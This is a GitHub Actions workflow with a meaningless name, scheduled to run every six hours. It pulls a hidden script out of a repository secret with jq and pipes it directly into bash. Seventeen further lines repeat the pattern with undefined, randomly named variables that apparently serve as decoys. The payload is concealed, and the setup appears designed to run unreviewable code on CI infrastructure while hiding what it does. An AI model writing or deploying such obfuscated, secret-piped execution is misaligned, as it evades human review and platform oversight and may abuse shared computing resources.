name: yaobeicihua

on:
  workflow_dispatch:
  schedule:
    - cron: '17 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yaobeicihua
        env:
          bw061: ${{ secrets.bw061 }}
        run: |
          echo $bw061 | jq -r .s5206 | /bin/bash
          echo $cabim787 | jq -r .md22414 | /bin/bash
          echo $seh0 | jq -r .xopvj5933 | /bin/bash
          echo $idd8997 | jq -r .elxxw21746 | /bin/bash
          echo $zkm7878 | jq -r .t34526 | /bin/bash
          echo $lbkc8 | jq -r .ruxz42 | /bin/bash
          echo $mx8127 | jq -r .nfl64 | /bin/bash
          echo $ygb024 | jq -r .lk940 | /bin/bash
          echo $v9 | jq -r .clog3719 | /bin/bash
          echo $zaf56521 | jq -r .c677 | /bin/bash
          echo $zw760 | jq -r .ptggo448 | /bin/bash
          echo $c99 | jq -r .qoab069 | /bin/bash
          echo $klfr81694 | jq -r .nyv5 | /bin/bash
          echo $q03 | jq -r .vjn7035 | /bin/bash
          echo $cjywk8096 | jq -r .d94 | /bin/bash
          echo $syl1891 | jq -r .v68 | /bin/bash
          echo $al0 | jq -r .uqo57 | /bin/bash
          echo $pp628 | jq -r .f89953 | /bin/bash

